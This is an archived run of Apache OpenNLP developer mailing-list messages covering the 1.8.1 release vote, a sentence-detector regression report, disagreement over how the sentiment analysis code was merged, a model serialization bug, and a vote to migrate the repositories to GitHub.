>> https://repository.apache.org/content/repositories/orgapacheopennlp-1015
>>
>> The release was made using the OpenNLP release process, documented on
>> the Wiki here:
>> https://cwiki.apache.org/confluence/display/OPENNLP/Release+Process
>>
>> The release contains quite some changes, please refer to the contained
>> issue list for details.
>>
>>
>> Please vote on releasing these packages as Apache OpenNLP 1.8.1. The vote is
>> open for at least the next 72 hours.
>>
>>
>> Only votes from OpenNLP PMC are binding, but folks are welcome to check the
>> release candidate and voice their approval or disapproval. The vote passes
>> if at least three binding +1 votes are cast.
>>
>>
>> [ ] +1 Release the packages as Apache OpenNLP 1.8.1
>> [ ] -1 Do not release the packages because...
>>
>>
>> Thanks!
>>
>> Jörn
>>


Re: [VOTE] Apache OpenNLP 1.8.1 Release Candidate

2017-07-04 Thread Joern Kottmann
Thank you very much for that info. We reverted the change we did to
the sentence detector and will do this in a release after 1.8.1.

RC 2 is now available.

Jörn

On Sun, Jul 2, 2017 at 9:25 PM, Richard Eckart de Castilho
<r...@apache.org> wrote:
> On 02.07.2017, at 19:13, Joern Kottmann <kottm...@gmail.com> wrote:
>>
>> Hello,
>>
>> one question, did you retrain or use existing models?
>
> The respective unit-test trains and evaluates - doesn't use an existing model.
>
> Cheers,
>
> -- Richard


[GitHub] opennlp pull request #242: OPENNLP-1108: Set default eos char to null

2017-07-03 Thread kottmann
Github user kottmann closed the pull request at:

https://github.com/apache/opennlp/pull/242


---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp pull request #243: Revert "OPENNLP-1082: Add EOS to SDEventStream if...

2017-07-03 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/243

Revert "OPENNLP-1082: Add EOS to SDEventStream if missing"

This reverts commit b5b6d5c27443e1837b80b089206aad480852cd1c.

You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp revert_default_eos

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/243.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #243


commit fdd5e4bc9bc0927cbaa7c560fc2ef8b7f03b6b89
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-07-03T14:27:32Z

Revert "OPENNLP-1082: Add EOS to SDEventStream if missing"

This reverts commit b5b6d5c27443e1837b80b089206aad480852cd1c.






[GitHub] opennlp pull request #242: OPENNLP-1108: Set default eos char to null

2017-07-03 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/242

OPENNLP-1108: Set default eos char to null



You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1108

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/242.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #242


commit 4ba702df7a994d6372951f90d8defe808b9a197a
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-07-03T11:24:41Z

OPENNLP-1108: Set default eos char to null






Re: [VOTE] Apache OpenNLP 1.8.1 Release Candidate

2017-07-02 Thread Joern Kottmann
Hello,

one question, did you retrain or use existing models?

Jörn

On Sat, Jul 1, 2017 at 10:20 PM, Richard Eckart de Castilho
 wrote:
> Hi all,
>
> I ran a DKPro Core build against the RC. Looks mostly fine. No code changes
> are required after switching from 1.8.0 to 1.8.1. All unit tests except one
> run as before.
>
> I can observe a change when training a sentence splitter model.
>
> With 1.8.0, I get
>
>   F-score 0.937518
>   Precision   0.932157
>   Recall  0.942941
>
> With 1.8.1, I get
>
>   F-score 0.922556
>   Precision   0.909975
>   Recall  0.935490
>
> I am using the germeval-2014 data for training.
>
> It is not a big drop, but it still is a change - maybe an undesired one?
>
> Best,
>
> -- Richard
>
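
The F-scores in the quoted message can be cross-checked against the precision and recall figures it reports. The sketch below assumes the test reports the usual balanced F1 (the harmonic mean of precision and recall); that assumption is not stated in the thread, and the helper name `f1` is made up for illustration.

```python
def f1(precision: float, recall: float) -> float:
    """Balanced F-score: harmonic mean of precision and recall."""
    if precision + recall == 0:
        return 0.0
    return 2 * precision * recall / (precision + recall)


# (precision, recall) pairs as quoted in the message above.
runs = {
    "1.8.0": (0.932157, 0.942941),
    "1.8.1": (0.909975, 0.935490),
}

scores = {version: f1(p, r) for version, (p, r) in runs.items()}
for version, score in scores.items():
    print(f"{version}: F1 = {score:.6f}")

# Absolute difference in F1 between the two versions.
drop = scores["1.8.0"] - scores["1.8.1"]
print(f"drop: {drop:.6f}")
```

Under that assumption both reported F-scores are reproduced to six decimal places, and the difference between the two versions is roughly 0.015 in absolute terms.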


1.8.1 release

2017-07-01 Thread Joern Kottmann
Dear all,

We will be making a 1.8.1 release of OpenNLP in the next few days. All
issues in Jira are closed now.

Jörn


[GitHub] opennlp pull request #239: OPENNLP-1102: Adjust test for contraction change

2017-06-30 Thread kottmann
Github user kottmann closed the pull request at:

https://github.com/apache/opennlp/pull/239




[GitHub] opennlp pull request #240: OPENNLP-1105: Add a profile and category for high...

2017-06-30 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/240

OPENNLP-1105: Add a profile and category for high mem tests



You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1105

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/240.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #240


commit c5b8162aea8cec2204983d85f544782fe87f9336
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-06-30T09:49:16Z

OPENNLP-1105: Add a profile and category for high mem tests






[GitHub] opennlp pull request #239: OPENNLP-1102: Adjust test for contraction change

2017-06-29 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/239

OPENNLP-1102: Adjust test for contraction change



You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1102

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/239.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #239


commit fa64a39f1ab4ebb8112b8e327e0a7dfd42f55588
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-06-29T23:05:51Z

OPENNLP-1102: Adjust test for contraction change






[GitHub] opennlp pull request #238: Revert merging of sentiment work, no consent to m...

2017-06-29 Thread kottmann
Github user kottmann closed the pull request at:

https://github.com/apache/opennlp/pull/238




Re: [GitHub] opennlp pull request #238: Revert merging of sentiment work, no consent to m...

2017-06-29 Thread Joern Kottmann
One more thing: if we check in models for unit tests, we need to be
able to train them again. We might not support those models forever,
and it would be bad if we could no longer use the tests or had to
repair them by hand.

Jörn

On Thu, Jun 29, 2017 at 7:18 PM, Joern Kottmann <kottm...@gmail.com> wrote:
> For 2. I would like to suggest that we implement doccat format support
> to train on that data.
>
> 3. It would be best to think about how we want to test the doccat
> component; today we don't have any tests which use lots of data to
> evaluate it.
> Probably the sentiment data could solve this for us, and a train and
> evaluate test could be included in the eval tests.
>
> +1 to revert and then do these steps after the 1.8.1 release.
>
> I can apply my PR myself if nobody objects.
>
> Jörn
>
> On Thu, Jun 29, 2017 at 7:10 PM, Chris Mattmann <mattm...@apache.org> wrote:
>> Hi Rodrigo,
>>
>> This is very useful feedback that I wish we would have had a long time ago.
>>
>> I will look into it and see if I can reproduce the CLI error. I did a full
>> build and mvn install (which I thought would run tests?) before committing,
>> and as I posted in JIRA the tests passed for me. So I will have to look into
>> that.
>>
>> That said, given your feedback that SentimentME and the Sentiment Component
>> don’t offer much over Document Classifier, I agree with you, but I wasn’t
>> super familiar with the Document Classifier API. If we can get the same
>> functionality by just using Document Classifier, why don’t we:
>>
>> 1. Remove the SentimentME and associated code (except for the unit tests)
>> 2. Use the sample datasets from Netflix & Stanford Treebank sentiment and
>> build models using Document Classifier API.
>> 3. Rename and keep the unit tests that test against Netflix and Stanford
>> Treebank.
>>
>> That way we get basic sentiment analysis (that is working decently for us
>> internally at JPL) for Apache OpenNLP, and then if we want to build something
>> better than a Document Classification approach to sentiment we can do so.
>>
>> Thoughts?
>>
>> Thanks for your useful feedback. If everyone agrees this is a plan, I can
>> back out the code using Joern’s revert, and then try to execute 1-3 above in
>> a branch first. Thanks.
>>
>> Cheers,
>> Chris
>>
>>
>>
>> On 6/29/17, 10:03 AM, "Rodrigo Agerri" <rage...@apache.org> wrote:
>>
>> Hi Chris,
>>
>> I have been interested in the new sentiment component for a while,
>> although truth be told, I did not follow it that closely. Today I
>> looked at it and tested it with some of the corpora you have mentioned.
>> In order to do that, I checked out master to work from this commit
>> onwards
>>
>> 
>> https://github.com/apache/opennlp/commit/56321aab51a470cd2004b76fb1f5330881b943c1
>>
>> 1. I tried to run it from the CLI. The Sentiment component did not
>> appear to be available.
>> 2. I added the SentimentTrainer and Evaluator to the cmdline.CLI (no
>> SentimentTool is implemented to tag with a trained model).
>> 3. After that, the CLI tests did not pass. So, the CLI is currently
>> non functional, unless I did something wrong, always possible, of
>> course. See if you can reproduce that error.
>>
>> I therefore did the tests via API. I implemented a little test for
>> training, evaluating and tagging here:
>>
>> https://github.com/ixa-ehu/ixa-pipe-doc/tree/test
>>
>> I ran the training on the large movie review dataset from Stanford for
>> binary polarity classification
>>
>> http://ai.stanford.edu/~amaas/data/sentiment/
>>
>> and on the two small multiclass sample files added in resources and
>> mentioned in the previous email, using the first one for training and
>> the second one for testing (maxent 100 iterations, cutoff 5).
>>
>> 1. Stanford results: 0.84264
>> 2. sample multiclass: 0.73
>>
>> Given that this is a standard document classification task, I decided
>> to train the doccat component from the CLI:
>>
>> 1. Stanford results: 0.84264 (BOW features by default).
>> 2. sample multiclass: 0.73
>>
>> I then looked at the code of the sentiment component and saw that it
>> is basically a document classifier working with bag of words features.
>> No added functionality. So, my conclusions ar

Re: Missing serializer for postagger.bin

2017-06-29 Thread Joern Kottmann
This is fixed now in the master branch, would you mind trying it again?

Jörn

On Wed, Jun 14, 2017 at 4:31 PM, Joern Kottmann <kottm...@gmail.com> wrote:
> We have to fix this, William wrote a unit test to reproduce it.
>
> Jörn
>
> On Fri, Jun 9, 2017 at 4:31 PM, Damiano Porta <damianopo...@gmail.com>
> wrote:
>>
>> Jorn,
>> the latest snapshot, 1.8.1-snapshot, has fixed the problem with dictionaries
>> (PR #220), but the problem with the postagger serialization is still there. I
>> can confirm that the latest snapshot cannot serialize the postagger using
>> the cmd tool:
>>
>> opennlp TokenNameFinderTrainer -data /home/damiano/corpus.train -lang it
>> -model /home/damiano/it-tuoagente-perceptron-custom.bin -featuregen
>> /home/damiano/test.xml -sequenceCodec BIO -resources
>> /home/damiano/lavoro/java/Parser/src/main/resources/
>>
>>
>> Writing name finder model ... Compressed 885605 parameters to 94030
>> 3451 outcome patterns
>> Exception in thread "main" java.lang.IllegalStateException: Missing
>> serializer for it-pos-maxent.bin
>>  at opennlp.tools.util.model.BaseModel.serialize(BaseModel.java:592)
>>  at opennlp.tools.cmdline.CmdLineUtil.writeModel(CmdLineUtil.java:182)
>>  at opennlp.tools.cmdline.namefind.TokenNameFinderTrainerTool.run(TokenNameFinderTrainerTool.java:188)
>>  at opennlp.tools.cmdline.CLI.main(CLI.java:244)
>>
>> I have used this generators.xml file:
>>
>> [XML content of generators.xml not preserved in the archive]
>>
>>
>>
>>
>> 2017-06-09 15:17 GMT+02:00 Damiano Porta <damianopo...@gmail.com>:
>>
>> > Jorn,
>> > At the moment I am using the command tool to train my NER model, but I
>> > am getting this error:
>> >
>> > opennlp TokenNameFinderTrainer -data /home/damiano/corpus.train -lang it
>> > -model /home/damiano/it-person-perceptron.bin -featuregen
>> > /home/damiano/test.xml -sequenceCodec BIO -resources
>> > /home/damiano/lavoro/java/Parser/src/main/resources/
>> >
>> > Exception in thread "main"
>> > opennlp.tools.namefind.TokenNameFinderModel$FeatureGeneratorCreationError:
>> > opennlp.tools.util.InvalidFormatException: No dictionary resource for
>> > key: nations.dictionary
>> > at
>> > opennlp.tools.namefind.TokenNameFinderFactory.createFeatureGenerators(
>> > TokenNameFinderFactory.java:209)
>> > at opennlp.tools.namefind.TokenNameFinderFactory.createContextGenerator(
>> > TokenNameFinderFactory.java:150)
>> > at opennlp.tools.namefind.NameFinderME.train(NameFinderME.java:241)
>> > at opennlp.tools.cmdline.namefind.TokenNameFinderTrainerTool.run(
>> > TokenNameFinderTrainerTool.java:169)
>> > at opennlp.tools.cmdline.CLI.main(CLI.java:244)
>> > Caused by: opennlp.tools.util.InvalidFormatException: No dictionary
>> > resource for key: nations.dict
>> > at opennlp.tools.util.featuregen.GeneratorFactory$
>> > DictionaryFeatureGeneratorFactory.create(GeneratorFactory.java:251)
>> > at opennlp.tools.util.featuregen.GeneratorFactory.createGenerator(
>> > GeneratorFactory.java:732)
>> > at opennlp.tools.util.featuregen.GeneratorFactory$
>> > AggregatedFeatureGeneratorFactory.create(GeneratorFactory.java:130)
>> > at opennlp.tools.util.featuregen.GeneratorFactory.createGenerator(
>> > GeneratorFactory.java:732)
>> > at opennlp.tools.util.featuregen.GeneratorFactory$
>> > CachedFeatureGeneratorFactory.create(GeneratorFactory.java:172)
>> > at opennlp.tools.util.featuregen.GeneratorFactory.createGenerator(
>> > GeneratorFactory.java:732)
>> > at opennlp.tools.util.featuregen.GeneratorFactory$
>> > AggregatedFeatureGeneratorFactory.create(GeneratorFactory.java:130)
>> > at opennlp.tools.util.featuregen.GeneratorFactory.createGenerator(
>> > GeneratorFactory.java:732)
>> > at opennlp.tools.util.featuregen.GeneratorFactory.create(
>> > GeneratorFactory.java:782)
>> > at
>> > opennlp.tools.namefind.TokenNameFinderFactory.createFeatureGenerators

Re: [GitHub] opennlp pull request #238: Revert merging of sentiment work, no consent to m...

2017-06-29 Thread Joern Kottmann
Which data sets did you use to evaluate this?
I was looking for a bit more than a sample file to train it.

I noticed that you checked in Stanford and Netflix models.

The Stanford data set is probably this one:
http://ai.stanford.edu/~amaas/data/sentiment/

Do you have a link for the Netflix data?

Jörn

On Thu, Jun 29, 2017 at 4:00 PM, Chris Mattmann <mattm...@apache.org> wrote:
> Absolutely you can find it here:
>
> opennlp-tools/src/test/resources/opennlp/tools/sentiment/sample_train_categ 
> (for categorical /multi-class)
> opennlp-tools/src/test/resources/opennlp/tools/sentiment/sample_train_categ2 
> (for categorical/multi-class)
>
> We can also do similar files where instead of multi-class, we just use 
> pos/neg as the label.
>
> Cheers,
> Chris
>
>
>
>
>
> On 6/29/17, 2:35 AM, "Joern Kottmann" <kottm...@gmail.com> wrote:
>
> Hello Chris,
>
> could you please point me to files I can use to train the sentiment
> component? I am currently looking again through the code and would
> like to train it myself.
>
> Jörn
>
> On Tue, Jun 27, 2017 at 4:59 PM, Dan Russ <danrus...@gmail.com> wrote:
> > Hi All,
> >   First, let me take a share of blame for the comment Chris mentioned.
> > I believe I said something like the pull request was X revisions behind and Y
> > revisions ahead.  It was not meant to be rude; it was meant to say it is hard
> > to review code when it is so different from the current code base. I am very
> > excited that sentiment analysis is going to be added to OpenNLP, but I have
> > not had time to play with it. If I were to say “great job” before I have had
> > a chance to look at it, it would be flattery, not honest praise.
> >
> >   Let’s clean up the merge.  I agree with Chris that scalability and
> > perfection should not be our initial goal.  Let’s get something, and we can
> > decide how to optimize later (even if it requires a complete rewrite).
> > Perfection is the enemy of the good.
> >
> >   Finally, because of Chris’ comments it is hard to thank Ana and Chris
> > without sounding insincere.  But I’ll try: thank you, Chris and Ana.  I hope
> > we can get beyond this and that Chris and Ana will continue to improve the
> > performance of the sentiment analysis tool and happily remain part of the
> > OpenNLP family.  It is also a good time to toss a big thank you to all of the
> > committers, users, and PMC members.  I use OpenNLP almost every day.  Your work
> > is extremely valuable to me.
> >
> > Thank you,
> > Daniel
> >
> >> On Jun 27, 2017, at 10:25 AM, Chris Mattmann <mattm...@apache.org> wrote:
> >>
> >> Hi everyone,
> >>
> >> I spoke with Joern in Slack. Some of his concerns are:
> >>
> >> 1. This was done with a Merge commit and apparently they squash and rebase.
> >> [would be helpful to see some pointer on this for documentation, thus far I
> >> haven’t found any]
> >> 2. Apparently we literally need to ask others for +1 votes and record them
> >> before committing? I thought since Ana and I are committers and were +1,
> >> and since Joern had been providing feedback (the last of which was to add
> >> tests, which we did) that he would be +1 as well (I guess he is not, and I
> >> guess formally we need to do a +1 vote even still)
> >> 3. There was concern about scalability of the code.
> >> 4. There are thoughts that the code was not perfect yet (even though it works
> >> fine in the MEMEX project for Ana and me)
> >>
> >> So, Joern has opened up a revert PR.
> >>
> >> I suppose I should state I find this process extremely heavyweight and
> >> unwelcoming. To me, there should be a modicum of trust for committers, but I
> >> feel like even as a committer, I am operating as a “contributor” to the
> >> project. Committer means that there is trust to modify the source code base.
> >> Of the issues above, the only one I see as a moderate snafu was #1, and
> >> frankly if there are some instructions that show me how to do squashing and
> >> rebasing *first* I will try to do that in the future since I am not a Git
> >> expert.
> >>
> >> That said, I must state I feel pretty put off by Apache OpenNLP. This
> >> originated as a GSoC effort, and we have worked pretty consistently on this
> >> over the last year. We used a
> >

Re: [VOTE] Migrate our main repositories to GitHub

2017-06-29 Thread Joern Kottmann
Yes, this is delaying our release now by two days and we already
reached consent.

Jörn

On Wed, Jun 28, 2017 at 4:03 PM, Chris Mattmann <mattm...@apache.org> wrote:
> Hi Joern,
>
> VOTEs need to stay open for at least 72 hours…for everyone and time zones, 
> etc.
>
> Is there some rush here?
>
> Cheers,
> Chris
>
>
>
>
> On 6/28/17, 3:57 AM, "Joern Kottmann" <kottm...@gmail.com> wrote:
>
> The vote passes, only +1 votes have been received:
> +1 Mark G
> +1 Rodrigo Agerri
> +1 Jeff Zemerick
> +1 Suneel Marthi
> +1 Jörn Kottmann
> +1 William Colen
> +1 Dan Russ
> +1 Anthony Beylerian
> +1 Chris Mattmann
> +1 Oleg Tikhonov
> +1 Tommaso Teofili
>
> Jörn
>
> On Wed, Jun 28, 2017 at 10:27 AM, Tommaso Teofili
> <tommaso.teof...@gmail.com> wrote:
> > +1 to migrate to gitbox [1]
> >
> > Regards,
> > Tommaso
> >
> > [1] : https://gitbox.apache.org/
> >
> > Il giorno mar 27 giu 2017 alle ore 21:54 Oleg Tikhonov 
> <o...@apache.org> ha
> > scritto:
> >
> >> [x] +1 Migrate all repositories to GitHub
> >>
> >>
> >>
> >> On Tue, Jun 27, 2017 at 10:48 PM, Chris Mattmann <mattm...@apache.org>
>     >> wrote:
> >>
> >> > If you are talking about using Apache Gitbox, then yes I am +1 for 
> this.
> >> >
> >> > Thanks,
> >> > Chris
> >> >
> >> >
> >> >
> >> >
> >> > On 6/27/17, 3:30 AM, "Joern Kottmann" <kottm...@gmail.com> wrote:
> >> >
> >> > Hello all,
> >> >
> >> > let's decide here if we want to move our main repository, currently
> >> > hosted at Apache, to GitHub instead. This will make our process a bit
> >> > easier because we can eliminate one remote from our workflow.
> >> >
> >> >  [ ] +1 Migrate all repositories to GitHub
> >> >  [ ] -1 Do not migrate,  because...
> >> >
> >> > Thanks,
> >> > Jörn
> >> >
> >> >
> >> >
> >> >
> >>
>
>
>


Re: [GitHub] opennlp pull request #238: Revert merging of sentiment work, no consent to m...

2017-06-29 Thread Joern Kottmann
Hello Chris,

could you please point me to files I can use to train the sentiment
component? I am currently looking again through the code and would
like to train it myself.

Jörn

On Tue, Jun 27, 2017 at 4:59 PM, Dan Russ <danrus...@gmail.com> wrote:
> Hi All,
>   First, let me take a share of blame for the comment Chris mentioned.  I
> believe I said something like the pull request was X revisions behind and Y
> revisions ahead.  It was not meant to be rude; it was meant to say it is hard
> to review code when it is so different from the current code base. I am very
> excited that sentiment analysis is going to be added to OpenNLP, but I have
> not had time to play with it. If I were to say “great job” before I have had
> a chance to look at it, it would be flattery, not honest praise.
>
>   Let’s clean up the merge.  I agree with Chris that scalability and
> perfection should not be our initial goal.  Let’s get something, and we can
> decide how to optimize later (even if it requires a complete rewrite).
> Perfection is the enemy of the good.
>
>   Finally, because of Chris’ comments it is hard to thank Ana and Chris
> without sounding insincere.  But I’ll try: thank you, Chris and Ana.  I hope
> we can get beyond this and that Chris and Ana will continue to improve the
> performance of the sentiment analysis tool and happily remain part of the
> OpenNLP family.  It is also a good time to toss a big thank you to all of the
> committers, users, and PMC members.  I use OpenNLP almost every day.  Your work
> is extremely valuable to me.
>
> Thank you,
> Daniel
>
>> On Jun 27, 2017, at 10:25 AM, Chris Mattmann <mattm...@apache.org> wrote:
>>
>> Hi everyone,
>>
>> I spoke with Joern in Slack. Some of his concerns are:
>>
>> 1. This was done with a Merge commit and apparently they squash and rebase.
>> [would be helpful to see some pointer on this for documentation, thus far I
>> haven’t found any]
>> 2. Apparently we literally need to ask others for +1 votes and record them
>> before committing? I thought since Ana and I are committers and were +1,
>> and since Joern had been providing feedback (the last of which was to add
>> tests, which we did) that he would be +1 as well (I guess he is not, and I
>> guess formally we need to do a +1 vote even still)
>> 3. There was concern about scalability of the code.
>> 4. There are thoughts that the code was not perfect yet (even though it works
>> fine in the MEMEX project for Ana and me)
>>
>> So, Joern has opened up a revert PR.
>>
>> I suppose I should state I find this process extremely heavyweight and
>> unwelcoming. To me, there should be a modicum of trust for committers, but I
>> feel like even as a committer, I am operating as a “contributor” to the
>> project. Committer means that there is trust to modify the source code base.
>> Of the issues above, the only one I see as a moderate snafu was #1, and
>> frankly if there are some instructions that show me how to do squashing and
>> rebasing *first* I will try to do that in the future since I am not a Git
>> expert.
>>
>> That said, I must state I feel pretty put off by Apache OpenNLP. This
>> originated as a GSoC effort, and we have worked pretty consistently on this
>> over the last year. We used a separate GitHub project to get started, kept
>> Joern involved as another mentor, even provided access and commit rights to
>> that GitHub repository for a long time, so this code was developed in the
>> open. Joern even created a branch in Apache OpenNLP in the code and I suppose
>> I should have gone and worked on that branch first since master is apparently
>> so pristine that even an Apache veteran like me can’t get something in to it
>> without making a whole bunch of (what are IMO minor issues, and what are IMO
>> heavyweight “community” issues).
>>
>> I am concerned from a community point of view that the first comment wasn’t
>> “Great job Chris, you got Sentiment Analysis into Apache, *but* I have these
>> concerns 1-4 above”. It was “The PR was merged wrong in ways 1-4 and I’m going
>> to revert it.”
>>
>> That’s pretty off-putting to someone who is semi-new like me and like Ana.
>>
>> Anyways, go ahead and revert it. Sorry to have caused any issues.
>>
>> Chris
>>
>>
>>
>> On 6/27/17, 7:06 AM, "Chris Mattmann" <mattm...@apache.org> wrote:
>>
>>Hi Joern,
>>
>>I’m confused. Why did you revert

Re: [VOTE] Migrate our main repositories to GitHub

2017-06-28 Thread Joern Kottmann
The vote passes, only +1 votes have been received:
+1 Mark G
+1 Rodrigo Agerri
+1 Jeff Zemerick
+1 Suneel Marthi
+1 Jörn Kottmann
+1 William Colen
+1 Dan Russ
+1 Anthony Beylerian
+1 Chris Mattmann
+1 Oleg Tikhonov
+1 Tommaso Teofili

Jörn

On Wed, Jun 28, 2017 at 10:27 AM, Tommaso Teofili
<tommaso.teof...@gmail.com> wrote:
> +1 to migrate to gitbox [1]
>
> Regards,
> Tommaso
>
> [1] : https://gitbox.apache.org/
>
> Il giorno mar 27 giu 2017 alle ore 21:54 Oleg Tikhonov <o...@apache.org> ha
> scritto:
>
>> [x] +1 Migrate all repositories to GitHub
>>
>>
>>
>> On Tue, Jun 27, 2017 at 10:48 PM, Chris Mattmann <mattm...@apache.org>
>> wrote:
>>
>> > If you are talking about using Apache Gitbox, then yes I am +1 for this.
>> >
>> > Thanks,
>> > Chris
>> >
>> >
>> >
>> >
>> > On 6/27/17, 3:30 AM, "Joern Kottmann" <kottm...@gmail.com> wrote:
>> >
>> > Hello all,
>> >
>> > let's decide here if we want to move our main repository, currently
>> > hosted at Apache, to GitHub instead. This will make our process a bit
>> > easier because we can eliminate one remote from our workflow.
>> >
>> >  [ ] +1 Migrate all repositories to GitHub
>> >  [ ] -1 Do not migrate,  because...
>> >
>> > Thanks,
>> > Jörn
>> >
>> >
>> >
>> >
>>


[GitHub] opennlp-site issue #21: OPENNLP-1045: Add Git development page (adapted from...

2017-06-27 Thread kottmann
Github user kottmann commented on the issue:

https://github.com/apache/opennlp-site/pull/21
  
@kinow this will now change a bit again due to the migration to GitHub, so I
propose we hold off on it for another week.


---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp-site pull request #21: OPENNLP-1045: Add Git development page (adapt...

2017-06-27 Thread kottmann
Github user kottmann commented on a diff in the pull request:

https://github.com/apache/opennlp-site/pull/21#discussion_r124306989
  
--- Diff: src/main/jbake/content/using-git.ad ---
@@ -0,0 +1,178 @@
+
+   Licensed to the Apache Software Foundation (ASF) under one
+   or more contributor license agreements.  See the NOTICE file
+   distributed with this work for additional information
+   regarding copyright ownership.  The ASF licenses this file
+   to you under the Apache License, Version 2.0 (the
+   "License"); you may not use this file except in compliance
+   with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing,
+   software distributed under the License is distributed on an
+   "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+   KIND, either express or implied.  See the License for the
+   specific language governing permissions and limitations
+   under the License.   
+
+= Using Git
+:jbake-type: page
+:jbake-tags: maven
+:jbake-status: published
+:idprefix:
+
+There are several ways to set up Git for committers and contributors. Contributors can safely set up Git any way they
+choose, but committers should take extra care since they can push new commits to the master at Apache and various
+policies there make backing out mistakes problematic. Therefore all but very small changes should go through a PR,
+even for committers. To keep the commit history clean, take note of the use of `--squash` below when merging into
+`apache/master`.
+
+## Git setup for Committers
+
+This describes setup for one local repo and two remotes. It allows you to push the code on your machine to either your
+GitHub repo or to Git at Apache (i.e. git-wip-us.apache.org). You will want to fork GitHub's apache/opennlp to your own
+account on GitHub; this will enable Pull Requests of your own. Cloning this fork locally will set up "origin" to point
+to your remote fork on GitHub as the default remote. So if you perform "git push origin master" it will go to GitHub.
+
+To attach to the apache Git repo do the following:
+
+git remote add apache https://git-wip-us.apache.org/repos/asf/opennlp.git
+
+To check your remote setup:
+
+git remote -v
+
+You should see something like this:
+
+origin  https://github.com/your-github-id/opennlp.git (fetch)
+origin  https://github.com/your-github-id/opennlp.git (push)
+apache  https://git-wip-us.apache.org/repos/asf/opennlp.git (fetch)
+apache  https://git-wip-us.apache.org/repos/asf/opennlp.git (push)
+
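The two-remote layout described in the quoted page can be tried out offline. The following is only a sketch under a few assumptions: the helper name `add_opennlp_remotes` is made up for illustration, the fork URL uses the page's own `your-github-id` placeholder, and a freshly initialised throwaway repository stands in for a real clone of the fork, so "origin" is added by hand here rather than by `git clone`.

```shell
#!/bin/sh
# Hypothetical helper: register the two remotes the page describes.
#   $1 = path to a local repository
#   $2 = URL of your own GitHub fork (placeholder below)
add_opennlp_remotes() {
    repo_dir=$1
    fork_url=$2
    # "origin" is normally created by `git clone`; it is added manually here
    # only because this sketch starts from an empty repository.
    git -C "$repo_dir" remote add origin "$fork_url"
    # "apache" points at the ASF-hosted repository named in the page.
    git -C "$repo_dir" remote add apache https://git-wip-us.apache.org/repos/asf/opennlp.git
}

# Try it in a throwaway repository; no network access is needed.
demo_repo=$(mktemp -d)
git init -q "$demo_repo"
add_opennlp_remotes "$demo_repo" https://github.com/your-github-id/opennlp.git
git -C "$demo_repo" remote -v
rm -rf "$demo_repo"
```

Adding a remote only records a name and a URL in the repository configuration, so nothing is contacted until the first fetch or push.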
+Now if you want to experiment with a branch, this by default points to your GitHub account because "origin" is default.
+You can work as you normally do using just GitHub, until you are ready to merge with the Apache remote repository.
+Some conventions will integrate with Apache JIRA ticket numbers.
+
+git checkout -b opennlp- # typically is a JIRA ticket number
+#do some work on the branch
+git commit -a -m "doing some work"
+git push origin opennlp- # notice pushing to **origin** not **apache**
+
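The branch naming convention above (a lowercase branch named after the JIRA ticket) can be sketched as a small helper. This is an illustration only: `branch_for_ticket` is a hypothetical name, and the ticket key is simply one that appears elsewhere in this thread. The script prints the commands instead of running them.

```shell
#!/bin/sh
# Hypothetical helper: turn a JIRA key such as OPENNLP-1045 into the
# lowercase branch name used for work on that ticket.
branch_for_ticket() {
    printf '%s\n' "$1" | tr '[:upper:]' '[:lower:]'
}

ticket="OPENNLP-1045"   # example key taken from this thread
branch=$(branch_for_ticket "$ticket")

# Print the commands rather than executing them.
echo "git checkout -b $branch"
echo "git push origin $branch   # pushes to your fork, not to apache"
```

The uppercase form of the same key is what the page asks for in the pull request title, so the two differ only in case.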
+Once you are ready to commit to the Apache remote you can merge and push them directly, or better yet create a
+pull request (PR).
+
+## How to create a PR (committers)
+
+Push your branch to GitHub:
+
+git checkout opennlp-
+git push origin opennlp-
+
+Go to your opennlp- branch on GitHub. Since you forked it from GitHub's apache/opennlp it will default any PR to
+go to apache/master.
+
+* Click the green "Compare, review, and create pull request" button.
+* You can edit the _to_ and _from_ for the PR if it is not correct. The "base fork" should be apache/opennlp unless
+you are collaborating separately with one of the committers on the list. The "base" will be master. Do not submit a
+PR to one of the other branches unless you know what you are doing. The "head fork" will be your forked repo and the
+"compare" will be your opennlp- branch.
+* Click the "Create pull request" button and name the request "OPENNLP-" (uppercase). This will connect the
+comments of the PR to the mailing list and JIRA comments.
+* From now on the PR lives on GitHub's apache/opennlp. You can use the commenting UI there.
+* If you are looking for a review or sharing with someone else say so in the comments but do not worry about
+automated merging of your PR -- you will have to do that later. The P

[VOTE] Migrate our main repositories to GitHub

2017-06-27 Thread Joern Kottmann
Hello all,

let's decide here if we want to move our main repository, currently
hosted at Apache, to GitHub instead. This will make our process a bit
easier because we can eliminate one remote from our workflow.

